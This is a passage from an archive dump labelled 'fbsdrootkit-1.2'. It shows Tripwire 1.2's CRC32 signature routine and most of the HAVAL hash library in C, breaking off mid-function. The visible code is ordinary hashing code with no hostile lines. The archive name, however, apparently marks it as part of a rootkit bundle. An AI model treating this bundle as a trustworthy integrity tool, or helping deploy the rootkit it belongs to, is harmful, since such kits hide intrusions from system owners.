0x7ec98b85, 0x738aad5c, 0x774bb0eb, 0x4f040d56, 0x4bc510e1, 0x46863638, 0x42472b8f, 0x5c007b8a, 0x58c1663d, 0x558240e4, 0x51435d53, 0x251d3b9e, 0x21dc2629, 0x2c9f00f0, 0x285e1d47, 0x36194d42, 0x32d850f5, 0x3f9b762c, 0x3b5a6b9b, 0x0315d626, 0x07d4cb91, 0x0a97ed48, 0x0e56f0ff, 0x1011a0fa, 0x14d0bd4d, 0x19939b94, 0x1d528623, 0xf12f560e, 0xf5ee4bb9, 0xf8ad6d60, 0xfc6c70d7, 0xe22b20d2, 0xe6ea3d65, 0xeba91bbc, 0xef68060b, 0xd727bbb6, 0xd3e6a601, 0xdea580d8, 0xda649d6f, 0xc423cd6a, 0xc0e2d0dd, 0xcda1f604, 0xc960ebb3, 0xbd3e8d7e, 0xb9ff90c9, 0xb4bcb610, 0xb07daba7, 0xae3afba2, 0xaafbe615, 0xa7b8c0cc, 0xa379dd7b, 0x9b3660c6, 0x9ff77d71, 0x92b45ba8, 0x9675461f, 0x8832161a, 0x8cf30bad, 0x81b02d74, 0x857130c3, 0x5d8a9099, 0x594b8d2e, 0x5408abf7, 0x50c9b640, 0x4e8ee645, 0x4a4ffbf2, 0x470cdd2b, 0x43cdc09c, 0x7b827d21, 0x7f436096, 0x7200464f, 0x76c15bf8, 0x68860bfd, 0x6c47164a, 0x61043093, 0x65c52d24, 0x119b4be9, 0x155a565e, 0x18197087, 0x1cd86d30, 0x029f3d35, 0x065e2082, 0x0b1d065b, 0x0fdc1bec, 0x3793a651, 0x3352bbe6, 0x3e119d3f, 0x3ad08088, 0x2497d08d, 0x2056cd3a, 0x2d15ebe3, 0x29d4f654, 0xc5a92679, 0xc1683bce, 0xcc2b1d17, 0xc8ea00a0, 0xd6ad50a5, 0xd26c4d12, 0xdf2f6bcb, 0xdbee767c, 0xe3a1cbc1, 0xe760d676, 0xea23f0af, 0xeee2ed18, 0xf0a5bd1d, 0xf464a0aa, 0xf9278673, 0xfde69bc4, 0x89b8fd09, 0x8d79e0be, 0x803ac667, 0x84fbdbd0, 0x9abc8bd5, 0x9e7d9662, 0x933eb0bb, 0x97ffad0c, 0xafb010b1, 0xab710d06, 0xa6322bdf, 0xa2f33668, 0xbcb4666d, 0xb8757bda, 0xb5365d03, 0xb1f740b4 }; /* * Compute a POSIX 1003.2 checksum. This routine has been broken out so that * other programs can use it. It takes a file descriptor to read from and * locations to store the crc and the number of bytes read. It returns 0 on * success and 1 on failure. Errno is set on failure. */ uint32 crc_total = 0xffffffff; /* The crc over a number of files. */ int sig_crc32_get(fd_in, ps_signature, siglen) int fd_in; char *ps_signature; int siglen; { register unsigned char *p; register int nr; register uint32 crc, len; unsigned char buf[BUFSIZE]; char scratch[100]; /* rewind the file descriptor */ if (lseek(fd_in, 0, SEEK_SET) < 0) { perror("sig_crc_get: lseek()"); exit(1); } #define COMPUTE(var, ch) (var) = (var) << 8 ^ crctab[(var) >> 24 ^ (ch)] crc = len = 0; crc_total = ~crc_total; while ((nr = read(fd_in, buf, BUFSIZE)) > 0) for (len += nr, p = buf; nr--; ++p) { COMPUTE(crc, *p); COMPUTE(crc_total, *p); } if (nr < 0) return (-1); /* Include the length of the file. */ for (; len != 0; len >>= 8) { COMPUTE(crc, len & 0xff); COMPUTE(crc_total, len & 0xff); } /* *cval = ~crc; */ crc_total = ~crc_total; /* output in ascii */ if (printhex) #if ( TW_TYPE32 == int ) sprintf(ps_signature, "%08x", crc); #else sprintf(ps_signature, "%08lx", crc); #endif else { uint32 l = crc; sprintf(ps_signature, "%6s", pltob64(&l, scratch, 1)); } return (0); } fbsdrootkit-1.2/tripwire-1.2/sigs/crc32/crc32.h100600 764 764 117 5434607525 16235 0ustar dfdf/* $Id: crc32.h,v 1.2 1993/08/19 05:27:49 genek Exp $ */ int sig_crc32_get(); fbsdrootkit-1.2/tripwire-1.2/sigs/haval/ 40700 764 764 0 5630552015 15240 5ustar dfdffbsdrootkit-1.2/tripwire-1.2/sigs/haval/Makefile100600 764 764 501 5611466353 16763 0ustar dfdf# $Id: Makefile,v 1.1 1994/07/15 11:03:07 gkim Exp $ # # Makefile for crc32 wrapper # # Gene Kim # Purdue University (now University of Arizona) # July 10, 1994 # all: haval.o havalwrapper.o .c.o: $(CC) $(CFLAGS) -c $< clean: -rm -f *.o .pure haval.o: ../../include/byteorder.h haval.o: haval.h haval.o: havalapp.h fbsdrootkit-1.2/tripwire-1.2/sigs/haval/haval.c100600 764 764 65561 5614757127 16650 0ustar dfdf/* * haval.c: specifies the routines in the HAVAL (V.1) hashing library. * * HAVAL is a one-way hashing algorithm with the following * collision-resistant property: * It is computationally infeasible to find two or more * messages that are hashed into the same fingerprint. * * Reference: * Y. Zheng, J. Pieprzyk and J. Seberry: * ``HAVAL --- a one-way hashing algorithm with variable * length of output'', Advances in Cryptology --- AUSCRYPT'92, * Lecture Notes in Computer Science, Springer-Verlag, 1993. * * Descriptions: * - haval_string: hash a string * - haval_file: hash a file * - haval_stdin: filter -- hash input from the stdin device * - haval_hash: hash a string of specified length * (Haval_hash is used in conjunction with * haval_start & haval_end.) * - haval_hash_block: hash a 32-word block * - haval_start: initialization * - haval_end: finalization * * Author: Yuliang Zheng * Department of Computer Science * University of Wollongong * Wollongong, NSW 2522, Australia * Email: yuliang@cs.uow.edu.au * Voice: +61 42 21 4331 (office) * * Date: June 1993 * * Copyright (C) 1993 by C^3SR. All rights reserved. * This program may not be sold or used as inducement to * buy a product without the written permission of C^3SR. */ /* * Some comments on getting Haval into Tripwire: * * - all #elif directives replaced by ugly #if/#else/#endif sequences. * not all compilers support #elif (an ANSI construct). * - byte-order is discovered at compile time. we use the information * in "../../include/byteorder.h" to get this information. */ /* begin Tripwire hook */ #include "../../include/byteorder.h" #include "../../include/config.h" #include #include #include "havalapp.h" #include "haval.h" /* end Tripwire hook */ #define VERSION 1 /* current version number */ /* Do not remove this line. Protyping depends on it! */ #if defined(__STDC__) || defined(__cplusplus) #define P_(s) s #else #define P_(s) () #endif void haval_string P_((char *, unsigned char *)); /* hash a string */ int haval_file P_((char *, unsigned char *)); /* hash a file */ void haval_stdin P_((void)); /* hash input from stdin */ void haval_start P_((haval_state *)); /* initialization */ void haval_hash P_((haval_state *, unsigned char *, unsigned int)); /* updating routine */ void haval_end P_((haval_state *, unsigned char *)); /* finalization */ void haval_hash_block P_((haval_state *)); /* hash a 32-word block */ static void haval_tailor P_((haval_state *)); /* folding the last output */ static unsigned char padding[128] = { /* constants for padding */ 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; #define f_1(x6, x5, x4, x3, x2, x1, x0) \ ((x1) & ((x0) ^ (x4)) ^ (x2) & (x5) ^ \ (x3) & (x6) ^ (x0)) #define f_2(x6, x5, x4, x3, x2, x1, x0) \ ((x2) & ((x1) & ~(x3) ^ (x4) & (x5) ^ (x6) ^ (x0)) ^ \ (x4) & ((x1) ^ (x5)) ^ (x3) & (x5) ^ (x0)) #define f_3(x6, x5, x4, x3, x2, x1, x0) \ ((x3) & ((x1) & (x2) ^ (x6) ^ (x0)) ^ \ (x1) & (x4) ^ (x2) & (x5) ^ (x0)) #define f_4(x6, x5, x4, x3, x2, x1, x0) \ ((x4) & ((x5) & ~(x2) ^ (x3) & ~(x6) ^ (x1) ^ (x6) ^ (x0)) ^ \ (x3) & ((x1) & (x2) ^ (x5) ^ (x6)) ^ \ (x2) & (x6) ^ (x0)) #define f_5(x6, x5, x4, x3, x2, x1, x0) \ ((x0) & ((x1) & (x2) & (x3) ^ ~(x5)) ^ \ (x1) & (x4) ^ (x2) & (x5) ^ (x3) & (x6)) /* * Permutations phi_{i,j}, i=3,4,5, j=1,...,i. * * PASS = 3: * 6 5 4 3 2 1 0 * | | | | | | | (replaced by) * phi_{3,1}: 1 0 3 5 6 2 4 * phi_{3,2}: 4 2 1 0 5 3 6 * phi_{3,3}: 6 1 2 3 4 5 0 * * PASS = 4: * 6 5 4 3 2 1 0 * | | | | | | | (replaced by) * phi_{4,1}: 2 6 1 4 5 3 0 * phi_{4,2}: 3 5 2 0 1 6 4 * phi_{4,3}: 1 4 3 6 0 2 5 * phi_{4,4}: 6 4 0 5 2 1 3 * * PASS = 5: * 6 5 4 3 2 1 0 * | | | | | | | (replaced by) * phi_{5,1}: 3 4 1 0 5 2 6 * phi_{5,2}: 6 2 1 0 3 4 5 * phi_{5,3}: 2 6 0 4 3 1 5 * phi_{5,4}: 1 5 3 2 0 4 6 * phi_{5,5}: 2 5 0 6 4 3 1 */ #if PASS == 3 # define Fphi_1(x6, x5, x4, x3, x2, x1, x0) \ f_1(x1, x0, x3, x5, x6, x2, x4) #else # if PASS == 4 # define Fphi_1(x6, x5, x4, x3, x2, x1, x0) \ f_1(x2, x6, x1, x4, x5, x3, x0) # else # define Fphi_1(x6, x5, x4, x3, x2, x1, x0) \ f_1(x3, x4, x1, x0, x5, x2, x6) # endif #endif #if PASS == 3 # define Fphi_2(x6, x5, x4, x3, x2, x1, x0) \ f_2(x4, x2, x1, x0, x5, x3, x6) #else # if PASS == 4 # define Fphi_2(x6, x5, x4, x3, x2, x1, x0) \ f_2(x3, x5, x2, x0, x1, x6, x4) # else # define Fphi_2(x6, x5, x4, x3, x2, x1, x0) \ f_2(x6, x2, x1, x0, x3, x4, x5) # endif #endif #if PASS == 3 # define Fphi_3(x6, x5, x4, x3, x2, x1, x0) \ f_3(x6, x1, x2, x3, x4, x5, x0) #else # if PASS == 4 # define Fphi_3(x6, x5, x4, x3, x2, x1, x0) \ f_3(x1, x4, x3, x6, x0, x2, x5) # else # define Fphi_3(x6, x5, x4, x3, x2, x1, x0) \ f_3(x2, x6, x0, x4, x3, x1, x5) # endif #endif #if PASS == 4 # define Fphi_4(x6, x5, x4, x3, x2, x1, x0) \ f_4(x6, x4, x0, x5, x2, x1, x3) #else # define Fphi_4(x6, x5, x4, x3, x2, x1, x0) \ f_4(x1, x5, x3, x2, x0, x4, x6) #endif #define Fphi_5(x6, x5, x4, x3, x2, x1, x0) \ f_5(x2, x5, x0, x6, x4, x3, x1) #define rotate_right(x, n) (((x) >> (n)) | ((x) << (32-(n)))) #define FF_1(x7, x6, x5, x4, x3, x2, x1, x0, w) { \ register haval_word temp = Fphi_1(x6, x5, x4, x3, x2, x1, x0); \ (x7) = rotate_right(temp, 7) + rotate_right((x7), 11) + (w); \ } #define FF_2(x7, x6, x5, x4, x3, x2, x1, x0, w, c) { \ register haval_word temp = Fphi_2(x6, x5, x4, x3, x2, x1, x0); \ (x7) = rotate_right(temp, 7) + rotate_right((x7), 11) + (w) + (c); \ } #define FF_3(x7, x6, x5, x4, x3, x2, x1, x0, w, c) { \ register haval_word temp = Fphi_3(x6, x5, x4, x3, x2, x1, x0); \ (x7) = rotate_right(temp, 7) + rotate_right((x7), 11) + (w) + (c); \ } #define FF_4(x7, x6, x5, x4, x3, x2, x1, x0, w, c) { \ register haval_word temp = Fphi_4(x6, x5, x4, x3, x2, x1, x0); \ (x7) = rotate_right(temp, 7) + rotate_right((x7), 11) + (w) + (c); \ } #define FF_5(x7, x6, x5, x4, x3, x2, x1, x0, w, c) { \ register haval_word temp = Fphi_5(x6, x5, x4, x3, x2, x1, x0); \ (x7) = rotate_right(temp, 7) + rotate_right((x7), 11) + (w) + (c); \ } /* * translate every four characters into a word. * assume the number of characters is a multiple of four. */ #define ch2uint(string, word, slen) { \ unsigned char *sp = string; \ haval_word *wp = word; \ while (sp < (string) + (slen)) { \ *wp++ = (haval_word)*sp | \ ((haval_word)*(sp+1) << 8) | \ ((haval_word)*(sp+2) << 16) | \ ((haval_word)*(sp+3) << 24); \ sp += 4; \ } \ } /* translate each word into four characters */ #define uint2ch(word, string, wlen) { \ haval_word *wp = word; \ unsigned char *sp = string; \ while (wp < (word) + (wlen)) { \ *(sp++) = (unsigned char)( *wp & 0xFF); \ *(sp++) = (unsigned char)((*wp >> 8) & 0xFF); \ *(sp++) = (unsigned char)((*wp >> 16) & 0xFF); \ *(sp++) = (unsigned char)((*wp >> 24) & 0xFF); \ wp++; \ } \ } /* hash a string */ void haval_string (string, fingerprint) char *string; unsigned char fingerprint[FPTLEN >> 3]; { haval_state state; unsigned int len = strlen (string); haval_start (&state); haval_hash (&state, (unsigned char *)string, len); haval_end (&state, fingerprint); } /* hash a file */ int haval_file (file_name, fingerprint) char *file_name; unsigned char fingerprint[FPTLEN >> 3]; { FILE *file; haval_state state; int len; unsigned char buffer[1024]; if ((file = fopen (file_name, "rb")) == NULL){ return (1); /* fail */ } else { haval_start (&state); while (len = fread (buffer, 1, 1024, file)) { haval_hash (&state, buffer, len); } fclose (file); haval_end (&state, fingerprint); return (0); /* success */ } } /* hash input from stdin */ void haval_stdin () { haval_state state; int i, len; unsigned char buffer[32], fingerprint[FPTLEN >> 3]; haval_start (&state); while (len = fread (buffer, 1, 32, stdin)) { haval_hash (&state, buffer, len); } haval_end (&state, fingerprint); for (i = 0; i < FPTLEN >> 3; i++) { putchar(fingerprint[i]); } } /* initialization */ void haval_start (state) haval_state *state; { state->count[0] = state->count[1] = 0; /* clear count */ state->fingerprint[0] = 0x243F6A88; /* initial fingerprint */ state->fingerprint[1] = 0x85A308D3; state->fingerprint[2] = 0x13198A2E; state->fingerprint[3] = 0x03707344; state->fingerprint[4] = 0xA4093822; state->fingerprint[5] = 0x299F31D0; state->fingerprint[6] = 0x082EFA98; state->fingerprint[7] = 0xEC4E6C89; } /* * hash a string of specified length. * to be used in conjunction with haval_start and haval_end. */ void haval_hash (state, str, str_len) haval_state *state; unsigned char *str; unsigned int str_len; { unsigned int i, rmd_len, fill_len; /* calculate the number of bytes in the remainder */ rmd_len = (unsigned int)((state->count[0] >> 3) & 0x7F); fill_len = 128 - rmd_len; /* update the number of bits */ if ((state->count[0] += (haval_word)str_len << 3) < ((haval_word)str_len << 3)) { state->count[1]++; } state->count[1] += (haval_word)str_len >> 29; #if BYTEORDER == 0x1234 /* hash as many blocks as possible */ if (rmd_len + str_len >= 128) { memcpy (((unsigned char *)state->block)+rmd_len, str, fill_len); haval_hash_block (state); for (i = fill_len; i + 127 < str_len; i += 128){ memcpy ((unsigned char *)state->block, str+i, 128); haval_hash_block (state); } rmd_len = 0; } else { i = 0; } memcpy (((unsigned char *)state->block)+rmd_len, str+i, str_len-i); #else /* hash as many blocks as possible */ if (rmd_len + str_len >= 128) { memcpy ((char*) &state->remainder[rmd_len], (char*) str, fill_len); ch2uint(state->remainder, state->block, 128); haval_hash_block (state); for (i = fill_len; i + 127 < str_len; i += 128){ memcpy ((char *) state->remainder, (char *) str+i, 128); ch2uint(state->remainder, state->block, 128); haval_hash_block (state); } rmd_len = 0; } else { i = 0; } /* save the remaining input chars */ memcpy ((char *) &state->remainder[rmd_len], (char *) str+i, str_len-i); #endif } /* finalization */ void haval_end (state, final_fpt) haval_state *state; unsigned char final_fpt[FPTLEN >> 3]; { unsigned char tail[10]; unsigned int rmd_len, pad_len; /* * save the version number, the number of passes, the fingerprint * length and the number of bits in the unpadded message. */ tail[0] = (unsigned char)(((FPTLEN & 0x3) << 6) | ((PASS & 0x7) << 3) | (VERSION & 0x7)); tail[1] = (unsigned char)((FPTLEN >> 2) & 0xFF); uint2ch (state->count, &tail[2], 2); /* pad out to 118 mod 128 */ rmd_len = (unsigned int)((state->count[0] >> 3) & 0x7f); pad_len = (rmd_len < 118) ? (118 - rmd_len) : (246 - rmd_len); haval_hash (state, padding, pad_len); /* * append the version number, the number of passes, * the fingerprint length and the number of bits */ haval_hash (state, tail, 10); /* tailor the last output */ haval_tailor(state); /* translate and save the final fingerprint */ uint2ch (state->fingerprint, final_fpt, FPTLEN >> 5); /* clear the state information */ memset ((char *)state, 0, sizeof (*state)); } /* hash a 32-word block */ void haval_hash_block (state) haval_state *state; { register haval_word t0 = state->fingerprint[0], /* make use of */ t1 = state->fingerprint[1], /* internal registers */ t2 = state->fingerprint[2], t3 = state->fingerprint[3], t4 = state->fingerprint[4], t5 = state->fingerprint[5], t6 = state->fingerprint[6], t7 = state->fingerprint[7], *w = state->block; /* Pass 1 */ FF_1(t7, t6, t5, t4, t3, t2, t1, t0, *(w )); FF_1(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 1)); FF_1(t5, t4, t3, t2, t1, t0, t7, t6, *(w+ 2)); FF_1(t4, t3, t2, t1, t0, t7, t6, t5, *(w+ 3)); FF_1(t3, t2, t1, t0, t7, t6, t5, t4, *(w+ 4)); FF_1(t2, t1, t0, t7, t6, t5, t4, t3, *(w+ 5)); FF_1(t1, t0, t7, t6, t5, t4, t3, t2, *(w+ 6)); FF_1(t0, t7, t6, t5, t4, t3, t2, t1, *(w+ 7)); FF_1(t7, t6, t5, t4, t3, t2, t1, t0, *(w+ 8)); FF_1(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 9)); FF_1(t5, t4, t3, t2, t1, t0, t7, t6, *(w+10)); FF_1(t4, t3, t2, t1, t0, t7, t6, t5, *(w+11)); FF_1(t3, t2, t1, t0, t7, t6, t5, t4, *(w+12)); FF_1(t2, t1, t0, t7, t6, t5, t4, t3, *(w+13)); FF_1(t1, t0, t7, t6, t5, t4, t3, t2, *(w+14)); FF_1(t0, t7, t6, t5, t4, t3, t2, t1, *(w+15)); FF_1(t7, t6, t5, t4, t3, t2, t1, t0, *(w+16)); FF_1(t6, t5, t4, t3, t2, t1, t0, t7, *(w+17)); FF_1(t5, t4, t3, t2, t1, t0, t7, t6, *(w+18)); FF_1(t4, t3, t2, t1, t0, t7, t6, t5, *(w+19)); FF_1(t3, t2, t1, t0, t7, t6, t5, t4, *(w+20)); FF_1(t2, t1, t0, t7, t6, t5, t4, t3, *(w+21)); FF_1(t1, t0, t7, t6, t5, t4, t3, t2, *(w+22)); FF_1(t0, t7, t6, t5, t4, t3, t2, t1, *(w+23)); FF_1(t7, t6, t5, t4, t3, t2, t1, t0, *(w+24)); FF_1(t6, t5, t4, t3, t2, t1, t0, t7, *(w+25)); FF_1(t5, t4, t3, t2, t1, t0, t7, t6, *(w+26)); FF_1(t4, t3, t2, t1, t0, t7, t6, t5, *(w+27)); FF_1(t3, t2, t1, t0, t7, t6, t5, t4, *(w+28)); FF_1(t2, t1, t0, t7, t6, t5, t4, t3, *(w+29)); FF_1(t1, t0, t7, t6, t5, t4, t3, t2, *(w+30)); FF_1(t0, t7, t6, t5, t4, t3, t2, t1, *(w+31)); /* Pass 2 */ FF_2(t7, t6, t5, t4, t3, t2, t1, t0, *(w+ 5), 0x452821E6); FF_2(t6, t5, t4, t3, t2, t1, t0, t7, *(w+14), 0x38D01377); FF_2(t5, t4, t3, t2, t1, t0, t7, t6, *(w+26), 0xBE5466CF); FF_2(t4, t3, t2, t1, t0, t7, t6, t5, *(w+18), 0x34E90C6C); FF_2(t3, t2, t1, t0, t7, t6, t5, t4, *(w+11), 0xC0AC29B7); FF_2(t2, t1, t0, t7, t6, t5, t4, t3, *(w+28), 0xC97C50DD); FF_2(t1, t0, t7, t6, t5, t4, t3, t2, *(w+ 7), 0x3F84D5B5); FF_2(t0, t7, t6, t5, t4, t3, t2, t1, *(w+16), 0xB5470917); FF_2(t7, t6, t5, t4, t3, t2, t1, t0, *(w ), 0x9216D5D9); FF_2(t6, t5, t4, t3, t2, t1, t0, t7, *(w+23), 0x8979FB1B); FF_2(t5, t4, t3, t2, t1, t0, t7, t6, *(w+20), 0xD1310BA6); FF_2(t4, t3, t2, t1, t0, t7, t6, t5, *(w+22), 0x98DFB5AC); FF_2(t3, t2, t1, t0, t7, t6, t5, t4, *(w+ 1), 0x2FFD72DB); FF_2(t2, t1, t0, t7, t6, t5, t4, t3, *(w+10), 0xD01ADFB7); FF_2(t1, t0, t7, t6, t5, t4, t3, t2, *(w+ 4), 0xB8E1AFED); FF_2(t0, t7, t6, t5, t4, t3, t2, t1, *(w+ 8), 0x6A267E96); FF_2(t7, t6, t5, t4, t3, t2, t1, t0, *(w+30), 0xBA7C9045); FF_2(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 3), 0xF12C7F99); FF_2(t5, t4, t3, t2, t1, t0, t7, t6, *(w+21), 0x24A19947); FF_2(t4, t3, t2, t1, t0, t7, t6, t5, *(w+ 9), 0xB3916CF7); FF_2(t3, t2, t1, t0, t7, t6, t5, t4, *(w+17), 0x0801F2E2); FF_2(t2, t1, t0, t7, t6, t5, t4, t3, *(w+24), 0x858EFC16); FF_2(t1, t0, t7, t6, t5, t4, t3, t2, *(w+29), 0x636920D8); FF_2(t0, t7, t6, t5, t4, t3, t2, t1, *(w+ 6), 0x71574E69); FF_2(t7, t6, t5, t4, t3, t2, t1, t0, *(w+19), 0xA458FEA3); FF_2(t6, t5, t4, t3, t2, t1, t0, t7, *(w+12), 0xF4933D7E); FF_2(t5, t4, t3, t2, t1, t0, t7, t6, *(w+15), 0x0D95748F); FF_2(t4, t3, t2, t1, t0, t7, t6, t5, *(w+13), 0x728EB658); FF_2(t3, t2, t1, t0, t7, t6, t5, t4, *(w+ 2), 0x718BCD58); FF_2(t2, t1, t0, t7, t6, t5, t4, t3, *(w+25), 0x82154AEE); FF_2(t1, t0, t7, t6, t5, t4, t3, t2, *(w+31), 0x7B54A41D); FF_2(t0, t7, t6, t5, t4, t3, t2, t1, *(w+27), 0xC25A59B5); /* Pass 3 */ FF_3(t7, t6, t5, t4, t3, t2, t1, t0, *(w+19), 0x9C30D539); FF_3(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 9), 0x2AF26013); FF_3(t5, t4, t3, t2, t1, t0, t7, t6, *(w+ 4), 0xC5D1B023); FF_3(t4, t3, t2, t1, t0, t7, t6, t5, *(w+20), 0x286085F0); FF_3(t3, t2, t1, t0, t7, t6, t5, t4, *(w+28), 0xCA417918); FF_3(t2, t1, t0, t7, t6, t5, t4, t3, *(w+17), 0xB8DB38EF); FF_3(t1, t0, t7, t6, t5, t4, t3, t2, *(w+ 8), 0x8E79DCB0); FF_3(t0, t7, t6, t5, t4, t3, t2, t1, *(w+22), 0x603A180E); FF_3(t7, t6, t5, t4, t3, t2, t1, t0, *(w+29), 0x6C9E0E8B); FF_3(t6, t5, t4, t3, t2, t1, t0, t7, *(w+14), 0xB01E8A3E); FF_3(t5, t4, t3, t2, t1, t0, t7, t6, *(w+25), 0xD71577C1); FF_3(t4, t3, t2, t1, t0, t7, t6, t5, *(w+12), 0xBD314B27); FF_3(t3, t2, t1, t0, t7, t6, t5, t4, *(w+24), 0x78AF2FDA); FF_3(t2, t1, t0, t7, t6, t5, t4, t3, *(w+30), 0x55605C60); FF_3(t1, t0, t7, t6, t5, t4, t3, t2, *(w+16), 0xE65525F3); FF_3(t0, t7, t6, t5, t4, t3, t2, t1, *(w+26), 0xAA55AB94); FF_3(t7, t6, t5, t4, t3, t2, t1, t0, *(w+31), 0x57489862); FF_3(t6, t5, t4, t3, t2, t1, t0, t7, *(w+15), 0x63E81440); FF_3(t5, t4, t3, t2, t1, t0, t7, t6, *(w+ 7), 0x55CA396A); FF_3(t4, t3, t2, t1, t0, t7, t6, t5, *(w+ 3), 0x2AAB10B6); FF_3(t3, t2, t1, t0, t7, t6, t5, t4, *(w+ 1), 0xB4CC5C34); FF_3(t2, t1, t0, t7, t6, t5, t4, t3, *(w ), 0x1141E8CE); FF_3(t1, t0, t7, t6, t5, t4, t3, t2, *(w+18), 0xA15486AF); FF_3(t0, t7, t6, t5, t4, t3, t2, t1, *(w+27), 0x7C72E993); FF_3(t7, t6, t5, t4, t3, t2, t1, t0, *(w+13), 0xB3EE1411); FF_3(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 6), 0x636FBC2A); FF_3(t5, t4, t3, t2, t1, t0, t7, t6, *(w+21), 0x2BA9C55D); FF_3(t4, t3, t2, t1, t0, t7, t6, t5, *(w+10), 0x741831F6); FF_3(t3, t2, t1, t0, t7, t6, t5, t4, *(w+23), 0xCE5C3E16); FF_3(t2, t1, t0, t7, t6, t5, t4, t3, *(w+11), 0x9B87931E); FF_3(t1, t0, t7, t6, t5, t4, t3, t2, *(w+ 5), 0xAFD6BA33); FF_3(t0, t7, t6, t5, t4, t3, t2, t1, *(w+ 2), 0x6C24CF5C); #if PASS >= 4 /* Pass 4. executed only when PASS =4 or 5 */ FF_4(t7, t6, t5, t4, t3, t2, t1, t0, *(w+24), 0x7A325381); FF_4(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 4), 0x28958677); FF_4(t5, t4, t3, t2, t1, t0, t7, t6, *(w ), 0x3B8F4898); FF_4(t4, t3, t2, t1, t0, t7, t6, t5, *(w+14), 0x6B4BB9AF); FF_4(t3, t2, t1, t0, t7, t6, t5, t4, *(w+ 2), 0xC4BFE81B); FF_4(t2, t1, t0, t7, t6, t5, t4, t3, *(w+ 7), 0x66282193); FF_4(t1, t0, t7, t6, t5, t4, t3, t2, *(w+28), 0x61D809CC); FF_4(t0, t7, t6, t5, t4, t3, t2, t1, *(w+23), 0xFB21A991); FF_4(t7, t6, t5, t4, t3, t2, t1, t0, *(w+26), 0x487CAC60); FF_4(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 6), 0x5DEC8032); FF_4(t5, t4, t3, t2, t1, t0, t7, t6, *(w+30), 0xEF845D5D); FF_4(t4, t3, t2, t1, t0, t7, t6, t5, *(w+20), 0xE98575B1); FF_4(t3, t2, t1, t0, t7, t6, t5, t4, *(w+18), 0xDC262302); FF_4(t2, t1, t0, t7, t6, t5, t4, t3, *(w+25), 0xEB651B88); FF_4(t1, t0, t7, t6, t5, t4, t3, t2, *(w+19), 0x23893E81); FF_4(t0, t7, t6, t5, t4, t3, t2, t1, *(w+ 3), 0xD396ACC5); FF_4(t7, t6, t5, t4, t3, t2, t1, t0, *(w+22), 0x0F6D6FF3); FF_4(t6, t5, t4, t3, t2, t1, t0, t7, *(w+11), 0x83F44239); FF_4(t5, t4, t3, t2, t1, t0, t7, t6, *(w+31), 0x2E0B4482); FF_4(t4, t3, t2, t1, t0, t7, t6, t5, *(w+21), 0xA4842004); FF_4(t3, t2, t1, t0, t7, t6, t5, t4, *(w+ 8), 0x69C8F04A); FF_4(t2, t1, t0, t7, t6, t5, t4, t3, *(w+27), 0x9E1F9B5E); FF_4(t1, t0, t7, t6, t5, t4, t3, t2, *(w+12), 0x21C66842); FF_4(t0, t7, t6, t5, t4, t3, t2, t1, *(w+ 9), 0xF6E96C9A); FF_4(t7, t6, t5, t4, t3, t2, t1, t0, *(w+ 1), 0x670C9C61); FF_4(t6, t5, t4, t3, t2, t1, t0, t7, *(w+29), 0xABD388F0); FF_4(t5, t4, t3, t2, t1, t0, t7, t6, *(w+ 5), 0x6A51A0D2); FF_4(t4, t3, t2, t1, t0, t7, t6, t5, *(w+15), 0xD8542F68); FF_4(t3, t2, t1, t0, t7, t6, t5, t4, *(w+17), 0x960FA728); FF_4(t2, t1, t0, t7, t6, t5, t4, t3, *(w+10), 0xAB5133A3); FF_4(t1, t0, t7, t6, t5, t4, t3, t2, *(w+16), 0x6EEF0B6C); FF_4(t0, t7, t6, t5, t4, t3, t2, t1, *(w+13), 0x137A3BE4); #endif #if PASS == 5 /* Pass 5. executed only when PASS = 5 */ FF_5(t7, t6, t5, t4, t3, t2, t1, t0, *(w+27), 0xBA3BF050); FF_5(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 3), 0x7EFB2A98); FF_5(t5, t4, t3, t2, t1, t0, t7, t6, *(w+21), 0xA1F1651D); FF_5(t4, t3, t2, t1, t0, t7, t6, t5, *(w+26), 0x39AF0176); FF_5(t3, t2, t1, t0, t7, t6, t5, t4, *(w+17), 0x66CA593E); FF_5(t2, t1, t0, t7, t6, t5, t4, t3, *(w+11), 0x82430E88); FF_5(t1, t0, t7, t6, t5, t4, t3, t2, *(w+20), 0x8CEE8619); FF_5(t0, t7, t6, t5, t4, t3, t2, t1, *(w+29), 0x456F9FB4); FF_5(t7, t6, t5, t4, t3, t2, t1, t0, *(w+19), 0x7D84A5C3); FF_5(t6, t5, t4, t3, t2, t1, t0, t7, *(w ), 0x3B8B5EBE); FF_5(t5, t4, t3, t2, t1, t0, t7, t6, *(w+12), 0xE06F75D8); FF_5(t4, t3, t2, t1, t0, t7, t6, t5, *(w+ 7), 0x85C12073); FF_5(t3, t2, t1, t0, t7, t6, t5, t4, *(w+13), 0x401A449F); FF_5(t2, t1, t0, t7, t6, t5, t4, t3, *(w+ 8), 0x56C16AA6); FF_5(t1, t0, t7, t6, t5, t4, t3, t2, *(w+31), 0x4ED3AA62); FF_5(t0, t7, t6, t5, t4, t3, t2, t1, *(w+10), 0x363F7706); FF_5(t7, t6, t5, t4, t3, t2, t1, t0, *(w+ 5), 0x1BFEDF72); FF_5(t6, t5, t4, t3, t2, t1, t0, t7, *(w+ 9), 0x429B023D); FF_5(t5, t4, t3, t2, t1, t0, t7, t6, *(w+14), 0x37D0D724); FF_5(t4, t3, t2, t1, t0, t7, t6, t5, *(w+30), 0xD00A1248); FF_5(t3, t2, t1, t0, t7, t6, t5, t4, *(w+18), 